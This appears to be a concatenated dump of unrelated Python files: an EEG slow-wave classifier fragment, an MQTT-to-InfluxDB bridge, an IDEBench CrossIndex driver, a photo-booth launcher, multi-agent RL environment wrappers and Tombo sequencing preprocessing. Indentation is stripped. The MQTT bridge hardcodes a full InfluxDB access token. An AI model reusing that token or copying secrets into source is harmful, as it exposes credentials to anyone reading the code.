test_data_features = test_data_analyser.process_data([test_data], self.data.shape)
classifier = ClassifySlowWavesScikit()
prediction = classifier.classify_data(training_features_training, events, test_data_features)
diff = np.diff(prediction)
linear_at_uncorrected = np.array(np.where(diff == 1))
rows, cols = linear_at_uncorrected.shape
to_remove_index = []
for i in range(cols - 1):
if linear_at_uncorrected[0][i + 1] - linear_at_uncorrected[0][i] < 60:
to_remove_index.append(i + 1)
linear_at = np.delete(linear_at_uncorrected, to_remove_index)
pos = []
length = len(self.data[0])
sync_events = []
''' Check for sync events'''
for val in linear_at.transpose():
sync_events.append(int(val % length))
remove_sync_point = set([x for x in sync_events if sync_events.count(x) > 1])
print remove_sync_point
#remove_sync_point.clear()
''' Remove the sync events from the actual array'''
for val in linear_at.transpose():
if int(val % length) not in remove_sync_point:
pos.append([int(val/length), int(val % length)])
pos_np = np.asarray(pos).transpose()
print type(pos_np)
scipy.io.savemat(str('activation_points/') + str(cg.loaded_data_file)
+ str('_acti_points.mat'), dict(x=pos_np[1], y=pos_np[0]))
if pos_np.size is 0:
print "No events detected"
return
self.s1.addPoints(x=pos_np[1], y=(pos_np[0] * 20))
self.s2.addPoints(x=pos_np[1], y=(pos_np[0] * 20))
def save_trained(self):
with open(cg.trained_file, 'wb') as output:
pickle.dump(self.trainingData, output, pickle.HIGHEST_PROTOCOL)
def load_trained(self):
self.trainingData = np.load(cg.get_trained_file())
self.curve_bottom[0].setData(self.trainingData.plotDat.flatten()[0:self.trainingData.plotLength])
self.curve_bottom[1].setData(self.trainingData.plotEvent.flatten()[0:self.trainingData.plotLength])
self.w3.setXRange(0, self.trainingData.plotLength, padding=0)
self.w3.setYRange(-10, 10, padding=0)
|
main.py
|
#!/usr/bin/env python3
import paho.mqtt.client as mqtt
import json
import time
import os, sys
import datetime as dt
from influxdb_client import InfluxDBClient, Point
from influxdb_client.client.write_api import SYNCHRONOUS
from config.config import parse
import logging
import threading
logging.basicConfig(format='%(asctime)s -- %(levelname)s : %(funcName)s(ln:%(lineno)d) :: %(message)s')
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
def on_connect(client, userdata, flags, rc):
""" The callback for when the client receives a CONNACK response from the server."""
logger.debug('Connected with result code ' + str(rc))
pass
def on_publish(client, userdata, result):
"""create function for callback"""
logger.debug("data published")
pass
def on_message(client, userdata, msg):
"""The callback for when a PUBLISH message is received from the server."""
logger.debug(msg.topic + ' ' + str(msg.payload))
my_json = msg.payload.decode('utf8').replace("'", '"')
if str(msg.topic).split("/")[0] == 'config':
logger.info("Config message received")
return
logger.info("Message received")
data = json.loads(my_json)
s = json.dumps(data, indent=4, sort_keys=True)
s = json.loads(s)
utc_dt = dt.datetime.now(dt.timezone.utc)
dtime = utc_dt.astimezone()
json_body = {
"measurement": s['measurement'],
"tags": s['tags'],
"fields": s['fields'],
"time": str(dtime)
}
write_api.write(bucket=bucket, record=Point.from_dict(json_body))
def main():
mqtt_client = mqtt.Client("mqtt-listener")
mqtt_client.username_pw_set(config["MQTT_USER"], config["MQTT_PASSWORD"])
mqtt_client.on_connect = on_connect
mqtt_client.on_message = on_message
mqtt_client.connect(config["MQTT_ADDRESS"], 1883, 60)
mqtt_client.subscribe(config["MQTT_TOPIC"])
mqtt_client.subscribe(config["MQTT_CONFIG_TOPIC"])
mqtt_client.loop_forever()
def pubber():
mqtt_client1 = mqtt.Client("mqtt-publisher")
mqtt_client1.username_pw_set(config["MQTT_USER"], config["MQTT_PASSWORD"])
mqtt_client1.connect(config["MQTT_ADDRESS"], 1883)
mqtt_client1.on_publish = on_publish
while True:
json_body = {
"measurement": "test",
"tags": {"test": "test"},
"fields": {"test": 1},
}
json_body = json.dumps(json_body, indent=4)
mqtt_client1.publish(config["MQTT_CONFIG_TOPIC"], json_body)
time.sleep(5)
if __name__ == '__main__':
logger.info('MQTT to InfluxDB bridge')
config = parse(config_section="TEST")
m = threading.Thread(target=pubber, daemon=True)
m.start()
bucket = "main"
db_client = InfluxDBClient(url=f"http://{config['InfluxDB_HOST']}:{config['InfluxDB_PORT']}",
token= "Z2ADB_tBwWNRlQaCNYB9DI8_Z49i4KXK6M0iHmlAuDtK2K8lSBvu7Szqc1XAT2Lk_Fkey7gkqUPeL5MtPV5Rwg==",
org='main')
write_api = db_client.write_api(write_options=SYNCHRONOUS)
query_api = db_client.query_api()
try:
main()
except KeyboardInterrupt:
logger.warning("Stopping")
try:
sys.exit(0)
except SystemExit:
os._exit(0)
|
crossindex.py
|
import os
import queue
import time
import sys
import traceback
from threading import Thread
sys.path.extend(['/home/xty/pj/CrossIndex/crossindex'])
import pandas as pd
from common import util
from crossindex_main import CrossIndex
from crossindex_main import Query
class IDEBenchDriver:
def init(self, options, schema, driver_arg):
self.time_of_latest_request = 0
self.isRunning = False
self.requests = queue.LifoQueue()
# load cube
print("crossindex initialization")
print("table name: %s" % schema.get_fact_table_name())
print("crossindex name: %s" % driver_arg['name'])
print("crossindex dimensions: %s" % driver_arg['dimensions'])
print("crossindex types: %s" % driver_arg['types'])
print("crossindex cube-dir: %s" % driver_arg['cube_dir'])
print("crossindex method: %s" % driver_arg['method'])
self.crossindex = CrossIndex(driver_arg['name'], driver_arg['dimensions'], driver_arg['types'])
if os.path.exists(driver_arg['cube_dir'] + driver_arg['name'] + '_csv.csv'):
# self.crossindex.load(driver_arg['cube_dir'], driver_arg['name'])
self.crossindex.load_csv(driver_arg)
else:
raise Exception("no crossindex exist!")
self.method = driver_arg['method']
self.cached_q = Query(cube=self.crossindex)
# self.cnt = 0
# self.threshold = 4
def workflow_start(self):
self.isRunning = True
self.time_of_latest_request = 0
thread = Thread(target=self.process)
thread.start()
def workflow_end(self):
self.isRunning = False
def process_request(self, viz_request, options, schema, result_queue):
self.requests.put((viz_request, options, schema, result_queue))
def process(self):
# while the workflow is running, pop the latest request from the stack and execute it
while self.isRunning:
try:
request = self.requests.get(timeout=1)
viz_request = request[0]
options = request[1]
schema = request[2]
result_queue = request[3]
# only execute requests that are newer than the last one we processed (drops old/no longer needed queries)
if viz_request.expected_start_time < self.time_of_latest_request:
viz_request.dropped = True
result_queue.put(viz_request)
continue
self.time_of_latest_request = viz_request.expected_start_time
self.execute_vizrequest(viz_request, options, schema, result_queue)
except Exception as ex:
# ignore queue-empty exceptions
traceback.print_exc()
pass
def execute_vizrequest(self, viz_request, options, schema, result_queue):
print("processsing...")
# print SQL translation of request and simulate query execution
sql_statement = viz_request.viz.get_computed_filter_as_sql(schema)
print(sql_statement)
q = Query(cube=self.crossindex)
q.parse(sql_statement)
# record start time
viz_request.start_time = util.get_current_ms_time()
if self.method == "direct":
res = self.direct_query(q)
elif self.method == "backward":
flag, res = self.backward_query(q)
viz_request.backward = flag
if res == 'dropped':
viz_request.dropped = True
# record end time
viz_request.end_time = util.get_current_ms_time()
# write an empty result to the viz_request
viz_request.result = {}
# notify IDEBench that processing is done by writing it to the result buffer
result_queue.put(viz_request)
def direct_query(self, q):
start = time.time()
res = self.crossindex.query_csv(q)
end = time.time()
print('direct query time:' + str(end - start))
return res
def backward_query(self, q):
start = time.time()
flag, res = self.crossindex.backward_query_csv(self.cached_q, q)
end = time.time()
print('backward query time:' + str(end - start))
# update cache
if not flag:
self.cached_q = q
return flag, res
|
greenie.py
|
"""
Configuration and launch of greenie GUI
"""
from glob import glob
import wx
import threading
import gui
import subprocess
import time
from os import path
#
# REQUIRED configuration
#
# list of directories containing foreground photos
photoDirs = ["/Users/someuser/Pictures/Eye-Fi"]
# directory containing background images
BGImagesDir = "/Users/someuser/greenie/backgrounds"
# directory in which to store generated compound images
CompoundImagesDir = "/Users/someuser/greenie/compound"
# directory in which to store a backup of all images that were sent to the printer
PrintedImagesDir = "/Users/someuser/greenie/printed"
# path to reference image, i.e. image of the empty green screen;
# # by default is the latest in folder containing reference images
referenceImage = glob("/Users/someuser/greenie/reference/*.[jJ][pP][gG]")[-1]
# printer name
PrinterName = "EPSON_XP_750_Series"
# printer options;
# here: paper source 3 (tray 2), landscape, fit to page, page size as given
PrinterOptions = ["-o", "EPIJ_FdSo=3", "-o", "landscape", "-o", "fit-to-page", "-o",
"PageSize=Custom.100x153mm", "-o", "EPIJ_Qual=46"]
#
# OPTIONAL configuration
#
# tolerance values for foreground masking, see greenscreen.Overlay for details
GreenScreenTol = [30., 40.]
# how often to poll the photoDirs for new photos
directoryPollingInterval = 1.0
#
# end of configuration
#
stopThreadsFlag = False
greenieGUI = None
greenieApp = None
def monitorPhotoDirs(callOnPresent=True):
"""
Monitor directories for new image files, call targetFunc on each new file path.
If 'callOnPresent' is True, targetFunc is initially called for all present files.
"""
previous = []
for d in photoDirs:
previous += glob(path.join(d, "*.[jJ][pP][gG]"))
if callOnPresent:
for f in previous:
greenieGUI.AddFGImage(f)
greenieGUI.RefreshGUI()
while not stopThreadsFlag:
time.sleep(directoryPollingInterval)
current = []
for d in photoDirs:
current += glob(path.join(d, "*.[jJ][pP][gG]"))
added = [f for f in current if f not in previous]
if len(added) > 0:
for f in added:
greenieGUI.AddFGImage(f)
previous = current
greenieGUI.RefreshGUI()
if __name__ == '__main__':
# set default printer
subprocess.check_call(["lpoptions", "-d", PrinterName])
# build and start GUI
greenieApp = wx.App()
greenieGUI = gui.GreenieGUI(BGImagesDir=BGImagesDir,
CompoundImagesDir=CompoundImagesDir,
PrintedImagesDir=PrintedImagesDir,
ReferenceImage=referenceImage,
PrinterOptions=PrinterOptions,
GreenScreenTol=GreenScreenTol)
greenieGUI.Show()
# start monitoring photo directories
threadFSMonitor = threading.Thread(target=monitorPhotoDirs, args=(True,))
threadFSMonitor.start()
# start GUI main loop
greenieApp.MainLoop()
# on return, the app has closed
stopThreadsFlag = True
pass
|
env_wrappers.py
|
"""
Modified from OpenAI Baselines code to work with multi-agent envs
"""
import numpy as np
from multiprocessing import Process, Pipe
from baselines.common.vec_env import VecEnv, CloudpickleWrapper
def worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper.x()
while True:
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.step(data)
if all(done):
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'reset_task':
ob = env.reset_task()
remote.send(ob)
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
elif cmd == 'get_agent_types':
if all([hasattr(a, 'adversary') for a in env.agents]):
remote.send(['adversary' if a.adversary else 'agent' for a in
env.agents])
else:
remote.send(['agent' for _ in env.agents])
else:
raise NotImplementedError
class SubprocVecEnv(VecEnv):
def __init__(self, env_fns, spaces=None):
"""
envs: list of gym environments to run in subprocesses
"""
self.waiting = False
self.closed = False
nenvs = len(env_fns)
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
self.ps = [Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
for p in self.ps:
p.daemon = True # if the main process crashes, we should not cause things to hang
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces', None))
observation_space, action_space = self.remotes[0].recv()
self.remotes[0].send(('get_agent_types', None))
self.agent_types = self.remotes[0].recv()
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def step_async(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def step_wait(self):
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
for remote in self.remotes:
remote.send(('reset', None))
return np.stack([remote.recv() for remote in self.remotes])
def reset_task(self):
for remote in self.remotes:
remote.send(('reset_task', None))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
self.closed = True
class DummyVecEnv(VecEnv):
def __init__(self, env_fns):
self.envs = [fn() for fn in env_fns]
env = self.envs[0]
VecEnv.__init__(self, len(env_fns), env.observation_space, env.action_space)
if all([hasattr(a, 'adversary') for a in env.agents]):
self.agent_types = ['adversary' if a.adversary else 'agent' for a in
env.agents]
else:
self.agent_types = ['agent' for _ in env.agents]
self.ts = np.zeros(len(self.envs), dtype='int')
self.actions = None
def step_async(self, actions):
self.actions = actions
def step_wait(self):
results = [env.step(a) for (a,env) in zip(self.actions, self.envs)]
obs, rews, dones, infos = map(np.array, zip(*results))
# print(obs)
# print(rews)
# print(dones)
# print(infos)
# print('*'*10)
# 这里的envs应该总是只有一个元素; 这里的修改是要让infos直接传出来
# result = self.envs[0].step(self.actions[0])
# obs, rews, dones, infos = \
# [np.array(result[0])],\
# [np.array(result[1])],\
# [np.array(result[2])],\
# [result[3]]
self.ts += 1
for (i, done) in enumerate(dones):
if all(done):
obs[i] = self.envs[i].reset()
self.ts[i] = 0
self.actions = None
return np.array(obs), np.array(rews), np.array(dones), infos
def reset(self):
results = [env.reset() for env in self.envs]
return np.array(results)
def close(self):
return
|
_preprocess.py
|
from __future__ import division, unicode_literals, absolute_import
from builtins import int, range, dict, map, zip
import io
import os
import re
import sys
import queue
# Future warning from cython in h5py
import warnings
warnings.simplefilter(action='ignore', category=FutureWarning)
import h5py
from tqdm import tqdm
from time import sleep
from itertools import islice
from multiprocessing import Process, Queue, Pipe
if sys.version_info[0] > 2:
unicode = str
from . import tombo_helper as th
VERBOSE = True
_MAX_QUEUE_SIZE = 1000
_ITER_QUEUE_LIMIT = 1000
_PROC_UPDATE_INTERVAL = 100
_MAX_FASTQ_QUEUE_SIZE = 10000
_SEQ_SUMMARY_FN_FIELD = 'filename'
_SEQ_SUMMARY_ID_FIELD = 'read_id'
# warning messages for annotate with fastqs over multiple processes,
# requiring passing warning codes to only print warning once.
_WARN_ID_VAL = 'ids'
_WARN_IO_VAL = 'io'
_WARN_MISMATCH_VAL = 'mismatch'
_WARN_OVRWRT_VAL = 'overwrite'
_WARN_UNIQ_VAL = 'uniq'
_WARN_CODES = (_WARN_ID_VAL, _WARN_IO_VAL, _WARN_MISMATCH_VAL, _WARN_OVRWRT_VAL)
_WARN_CODES_PREP = (_WARN_OVRWRT_VAL, _WARN_UNIQ_VAL)
_WARN_PREFIX = '****** WARNING ****** '
##########################
###### Annotate Raw ######
##########################
def _prep_fast5_for_fastq(fast5_data, bc_grp_name, bc_subgrp_name, overwrite):
#print("there")
read_id = th.get_raw_read_slot(fast5_data).attrs.get('read_id')
try:
read_id = read_id.decode()
except (AttributeError, TypeError):
pass
#print(read_id,fast5_data.filename.split("_")[-4:])
sp = fast5_data.filename.split("_")[-4:]
read_id="ch%s_read%s"%(sp[-2],sp[-4])
#print(read_id)
if read_id is None:
return
# if Analyses group doesn't exist yet, create it
try:
analyses_grp = fast5_data['/Analyses']
except:
try:
analyses_grp = fast5_data.create_group('Analyses')
except:
print("Probably No permission to write")
# create Fastq slot, unless value exists and --overwrite is not set
try:
bc_grp = analyses_grp[bc_grp_name]
bc_subgrp = analyses_grp[bc_subgrp_name]
except:
try:
bc_grp = analyses_grp.create_group(bc_grp_name)
bc_subgrp = bc_grp.create_group(bc_subgrp_name)
except:
if overwrite:
del analyses_grp[bc_grp_name]
bc_grp = analyses_grp.create_group(bc_grp_name)
bc_subgrp = bc_grp.create_group(bc_subgrp_name)
else:
raise th.TomboError(
bc_grp_name + ' exists and --overwrite is not set.')
return read_id
def _annotate_with_fastqs_worker(
fastq_rec_q, fast5s_read_ids, fastq_slot, fq_slot_prepped,
prog_q, warn_q, bc_grp_name, bc_subgrp_name, overwrite):
been_warned = dict((warn_code, False) for warn_code in _WARN_CODES)
num_recs_proc = 0
#print(fast5s_read_ids)
while True:
fastq_rec = fastq_rec_q.get()
if fastq_rec is None:
break
# extract read_id from fastq (which should be the first text after
# the "@" record delimiter up to the first white space or underscore
read_id = "_".join(fastq_rec[0].split()[0].split('_')[:2])[1:]
#print("annotate ",read_id)
#print(fast5s_read_ids)
if read_id not in fast5s_read_ids:
#print("Not found")
if not been_warned[_WARN_ID_VAL]:
been_warned[_WARN_ID_VAL] = True
warn_q.put(_WARN_ID_VAL)
continue
#print("Faound",fastq_rec)
try:
with h5py.File(fast5s_read_ids[read_id], 'r+') as fast5_data:
if not fq_slot_prepped:
try:
file_parsed_id = _prep_fast5_for_fastq(
fast5_data, bc_grp_name, bc_subgrp_name, overwrite)
except th.TomboError:
if not been_warned[_WARN_OVRWRT_VAL]:
been_warned[_WARN_OVRWRT_VAL] = True
warn_q.put(_WARN_OVRWRT_VAL)
continue
if read_id != file_parsed_id:
if not been_warned[_WARN_MISMATCH_VAL]:
been_warned[_WARN_MISMATCH_VAL] = True
warn_q.put(_WARN_MISMATCH_VAL)
continue
bc_slot = fast5_data[fastq_slot]
# add sequence to fastq slot
bc_slot.create_dataset(
'Fastq', data=''.join(fastq_rec),
dtype=h5py.special_dtype(vlen=unicode))
# progress q update
num_recs_proc += 1
if num_recs_proc % _PROC_UPDATE_INTERVAL == 0:
prog_q.put(_PROC_UPDATE_INTERVAL)
except:
if not been_warned[_WARN_IO_VAL]:
been_warned[_WARN_IO_VAL] = True
warn_q.put(_WARN_IO_VAL)
continue
# add last number of records reported from this process
prog_q.put(num_recs_proc % _PROC_UPDATE_INTERVAL)
return
def _feed_seq_records_worker(fastq_fns, fastq_rec_q, num_processes):
for fastq_fn in fastq_fns:
n_recs = 0
with io.open(fastq_fn) as fastq_fp:
while True:
fastq_rec = list(islice(fastq_fp, 4))
# if record contains fewer than 4 lines this indicates the
# EOF, so move to next file
if len(fastq_rec) != 4: break
# if sequence identifier line does not start with "@" or quality
# score line does not start with a "+" the file may be
# corrupted, so don't process any more records
if (re.match('@', fastq_rec[0]) is None or
re.match('\+', fastq_rec[2]) is None):
# TODO maybe send this as a warning code to avoid poorly
# formatted output
th.warning_message(
'Successfully parsed ' + unicode(n_recs) +
' FASTQ records from ' + fastq_fn + ' before ' +
'encountering an invalid record. The rest of ' +
'this file will not be processed.')
break
n_recs += 1
fastq_rec_q.put(fastq_rec)
# put none records to trigger annotation processes to exit
for _ in range(num_processes):
fastq_rec_q.put(None)
return
def _get_ann_queues(prog_q, warn_q, num_read_ids, wp_conn):
if VERBOSE: bar = tqdm(total=num_read_ids, smoothing=0)
been_warned = dict((warn_code, False) for warn_code in _WARN_CODES)
def update_warn(warn_val):
if warn_val == _WARN_ID_VAL:
if VERBOSE and not been_warned[_WARN_ID_VAL]:
bar.write(
_WARN_PREFIX + 'Some FASTQ records contain read ' +
'identifiers not found in any FAST5 files or ' +
'sequencing summary files.',
file=sys.stderr)
been_warned[_WARN_ID_VAL] = True
elif warn_val == _WARN_IO_VAL:
if VERBOSE and not been_warned[_WARN_IO_VAL]:
bar.write(
_WARN_PREFIX + 'Some read files could not be accessed.',
file=sys.stderr)
been_warned[_WARN_IO_VAL] = True
elif warn_val == _WARN_MISMATCH_VAL:
if VERBOSE and not been_warned[_WARN_MISMATCH_VAL]:
bar.write(
_WARN_PREFIX + 'Read ID(s) found in sequencing summary ' +
'and FAST5 file are discordant. Skipping such reads.',
file=sys.stderr)
been_warned[_WARN_MISMATCH_VAL] = True
elif warn_val == _WARN_OVRWRT_VAL:
if VERBOSE and not been_warned[_WARN_OVRWRT_VAL]:
bar.write(
_WARN_PREFIX + 'Basecalls exsit in specified slot for ' +
'some reads. Set --overwrite option to overwrite these ' +
'basecalls.', file=sys.stderr)
been_warned[_WARN_OVRWRT_VAL] = True
else:
if VERBOSE: bar.write(
_WARN_PREFIX + 'Invalid warning code encountered.',
file=sys.stderr)
return
total_added_seqs = 0
while True:
try:
iter_added = prog_q.get(block=False)
total_added_seqs += iter_added
if VERBOSE: bar.update(iter_added)
except queue.Empty:
try:
warn_val = warn_q.get(block=False)
update_warn(warn_val)
except queue.Empty:
sleep(0.1)
# check if main thread has finished with all fastq records
if wp_conn.poll():
break
# collect all remaining warn and progress values
while not prog_q.empty():
iter_added = prog_q.get(block=False)
total_added_seqs += iter_added
if VERBOSE: bar.update(iter_added)
while not warn_q.empty():
warn_val = warn_q.get(block=False)
update_warn(warn_val)
if VERBOSE:
bar.close()
th.status_message('Added sequences to a total of ' +
str(total_added_seqs) + ' reads.')
if total_added_seqs < num_read_ids:
th.warning_message(
'Not all read ids from FAST5s or sequencing summary files ' +
'were found in FASTQs.\n\t\tThis can result from reads that ' +
'failed basecalling or if full sets of FAST5s/sequence ' +
'summaries are not processed with full sets of FASTQs.')
return
def _annotate_with_fastqs(
fastq_fns, fast5s_read_ids, fastq_slot, fq_slot_prepped, num_processes,
bc_grp_name, bc_subgrp_name, overwrite):
if VERBOSE: th.status_message('Annotating FAST5s with sequence from FASTQs.')
fastq_rec_q = Queue(maxsize=_MAX_FASTQ_QUEUE_SIZE)
prog_q = Queue()
warn_q = Queue()
# open a single process to read fastq files and feed the fastq record queue
fq_feed_p = Process(target=_feed_seq_records_worker,
args=(fastq_fns, fastq_rec_q, num_processes))
fq_feed_p.daemon = True
fq_feed_p.start()
# open fast5 annotation processes
ann_args = (fastq_rec_q, fast5s_read_ids, fastq_slot, fq_slot_prepped,
prog_q, warn_q, bc_grp_name, bc_subgrp_name, overwrite)
ann_ps = []
for p_id in range(num_processes):
ann_p = Process(target=_annotate_with_fastqs_worker, args=ann_args)
ann_p.daemon = True
ann_p.start()
ann_ps.append(ann_p)
main_wp_conn, wp_conn = Pipe()
warn_prog_p = Process(target=_get_ann_queues,
args=(prog_q, warn_q, len(fast5s_read_ids), wp_conn))
warn_prog_p.daemon = True
warn_prog_p.start()
fq_feed_p.join()
for ann_p in ann_ps:
ann_p.join()
# send signal to warn/progress queue that all other processes are complete
main_wp_conn.send(True)
warn_prog_p.join()
return
##########################
#### Extract read_ids ####
##########################
def _get_prep_queue(read_ids_q, prog_q, warn_q, gp_conn, num_fast5s):
"""Process all records from all fast5 prep queues
"""
ovrwrt_mess = (
_WARN_PREFIX + 'Basecalls exsit in specified slot for some ' +
'reads. Set --overwrite option to overwrite these basecalls.')
fast5s_read_ids = {}
# Warn non-unique read_ids in directory
been_warned = dict((warn_code, False) for warn_code in _WARN_CODES_PREP)
if VERBOSE: bar = tqdm(total=num_fast5s, smoothing=0)
while True:
try:
read_id, fast5_fn = read_ids_q.get(block=False)
if read_id in fast5s_read_ids:
if VERBOSE and not been_warned[_WARN_UNIQ_VAL]:
bar.write(
_WARN_PREFIX + 'Multiple FAST5 files contain the ' +
'same read ID. Ensure that FAST5 files are from a ' +
'single run.', file=sys.stderr)
been_warned[_WARN_UNIQ_VAL] = True
continue
fast5s_read_ids[read_id] = fast5_fn
except queue.Empty:
try:
warn_val = warn_q.get(block=False)
if warn_val == _WARN_OVRWRT_VAL:
if VERBOSE and not been_warned[_WARN_OVRWRT_VAL]:
bar.write(ovrwrt_mess, file=sys.stderr)
been_warned[_WARN_OVRWRT_VAL] = True
else:
bar.write(_WARN_PREFIX + 'Invalid warning code encountered.',
file=sys.stderr)
except queue.Empty:
try:
if VERBOSE: bar.update(prog_q.get(block=False))
except queue.Empty:
sleep(0.1)
# check if main thread has finished with all FAST5s
if gp_conn.poll():
break
while not read_ids_q.empty():
read_id, fast5_fn = read_ids_q.get(block=False)
fast5s_read_ids[read_id] = fast5_fn
while not warn_q.empty():
warn_val = warn_q.get(block=False)
if warn_val == _WARN_OVRWRT_VAL:
if VERBOSE and not been_warned[_WARN_OVRWRT_VAL]:
bar.write(ovrwrt_mess, file=sys.stderr)
been_warned[_WARN_OVRWRT_VAL] = True
else:
bar.write(_WARN_PREFIX + 'Invalid warning code encountered.',
file=sys.stderr)
while not prog_q.empty():
if VERBOSE: bar.update(prog_q.get(block=False))
if VERBOSE: bar.close()
gp_conn.send(fast5s_read_ids)
return
def _prep_fastq_slot_worker(
fast5_q, bc_grp, bc_subgrp, overwrite, read_ids_q, prog_q, warn_q):
num_files_proc = 0
been_warned_overwrite = False
while True:
try:
fast5_fn = fast5_q.get(block=False)
except queue.Empty:
sleep(0.1)
continue
if fast5_fn is None:
break
num_files_proc += 1
if num_files_proc % _PROC_UPDATE_INTERVAL == 0:
prog_q.put(_PROC_UPDATE_INTERVAL)
try:
with h5py.File(fast5_fn) as fast5_data:
try:
read_id = _prep_fast5_for_fastq(
fast5_data, bc_grp, bc_subgrp, overwrite)
#print("la")
except th.TomboError:
# avoid the warn queue getting too large by sending overwite
# warnings for each read from each thread
if not been_warned_overwrite:
been_warned_overwrite = True
warn_q.put(_WARN_OVRWRT_VAL)
#print("err")
continue
except:
continue
if read_id is None:
continue
read_ids_q.put((read_id, fast5_fn))
prog_q.put(num_files_proc % _PROC_UPDATE_INTERVAL)
return
def _fill_files_queue(fast5_q, fast5_fns, num_ps):
for fast5_fn in fast5_fns:
fast5_q.put(fast5_fn)
for _ in range(num_ps):
fast5_q.put(None)
return
def _get_read_ids_and_prep_fastq_slot(
fast5s_dir, bc_grp, bc_subgrp, overwrite, num_processes):
"""Extract read id from /Raw group and prep fastq slots for annotation with
associated FASTQ files.
"""
if VERBOSE: th.status_message(
'Preparing reads and extracting read identifiers.')
fast5_q = Queue(maxsize=_MAX_QUEUE_SIZE)
read_ids_q = Queue()
prog_q = Queue()
warn_q = Queue()
fast5_fns = th.get_files_list(fast5s_dir)
#print(fast5_fns)
files_p = Process(target=_fill_files_queue,
args=(fast5_q, fast5_fns, num_processes))
files_p.daemon = True
files_p.start()
prep_args = (fast5_q, bc_grp, bc_subgrp, overwrite, read_ids_q,
prog_q, warn_q)
prep_ps = []
for p_id in range(num_processes):
prep_p = Process(target=_prep_fastq_slot_worker, args=prep_args)
prep_p.daemon = True
prep_p.start()
prep_ps.append(prep_p)
main_gp_conn, gp_conn = Pipe()
get_prep_p = Process(
target=_get_prep_queue,
args=(read_ids_q, prog_q, warn_q, gp_conn, len(fast5_fns)))
get_prep_p.daemon = True
get_prep_p.start()
# join all processes into the main thread
files_p.join()
for prep_p in prep_ps:
prep_p.join()
# send signal to get_prep queue that all other processes are complete
main_gp_conn.send(True)
fast5s_read_ids = main_gp_conn.recv()
return fast5s_read_ids
def _parse_sequencing_summary_files(fast5s_dir, seq_summary_fns):
if VERBOSE: th.status_message('Getting read filenames.')
full_fast5_fns = {}
# walk through directory structure searching for fast5 files
for root, _, fns in os.walk(fast5s_dir):
for fn in fns:
if not fn.endswith('.fast5'): continue
full_fast5_fns[fn] = os.path.join(root, fn)
if VERBOSE: th.status_message('Parsing sequencing summary files.')
fast5s_read_ids = {}
been_warned = False
for seq_summary_fn in seq_summary_fns:
with open(seq_summary_fn) as fp:
try:
header_fields = fp.readline().split()
fn_field = next(i for i, h_field in enumerate(header_fields)
if re.match(_SEQ_SUMMARY_FN_FIELD, h_field))
id_field = next(i for i, h_field in enumerate(header_fields)
if re.match(_SEQ_SUMMARY_ID_FIELD, h_field))
except:
th.warning_message(
'Could not extract header information for sequencing ' +
'summary file: ' + seq_summary_fn)
continue
try:
for line in fp:
rec_fields = line.split()
rec_short_fn = rec_fields[fn_field]
try:
rec_full_fn = full_fast5_fns[rec_short_fn]
except KeyError:
if not been_warned:
th.warning_message(
'Some FASTQ records from sequencing summaries ' +
'do not appear to have a matching file.')
been_warned = True
continue
# convert filename to full filename and link to read id
fast5s_read_ids[rec_fields[id_field]] = rec_full_fn
except:
th.warning_message(
'Error parsing records for sequencing ' +
'summary file: ' + seq_summary_fn)
return fast5s_read_ids
##################################
###### Annotate FAST5s Main ######
##################################
def annotate_reads_with_fastq_main(args):
global VERBOSE
VERBOSE = not args.quiet
th.VERBOSE = VERBOSE
fast5s_basedir = (
args.fast5_basedir if args.fast5_basedir.endswith('/') else
args.fast5_basedir + '/')
if args.sequencing_summary_filenames:
fast5s_read_ids = _parse_sequencing_summary_files(
fast5s_basedir, args.sequencing_summary_filenames)
fq_slot_prepped = False
else:
fast5s_read_ids = _get_read_ids_and_prep_fastq_slot(
fast5s_basedir, args.basecall_group, args.basecall_subgroup,
args.overwrite, args.processes)
fq_slot_prepped = True
fastq_slot = '/'.join(('/Analyses', args.basecall_group,
args.basecall_subgroup))
_annotate_with_fastqs(
args.fastq_filenames, fast5s_read_ids, fastq_slot, fq_slot_prepped,
args.processes, args.basecall_group, args.basecall_subgroup,
args.overwrite)
return
if __name__ == '__main__':
sys.stderr.write('This is a module. See commands with `tombo -h`')
sys.exit(1)
|
actor.py
|
#!/usr/bin/env python3
# MIT License
#
# Copyright (c) 2020 FABRIC Testbed
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
#
# Author: Komal Thareja (kthare10@renci.org)
import queue
import threading
import traceback
from typing import List
from fabric_cf.actor.core.apis.abc_delegation import ABCDelegation
from fabric_cf.actor.core.apis.abc_policy import ABCPolicy
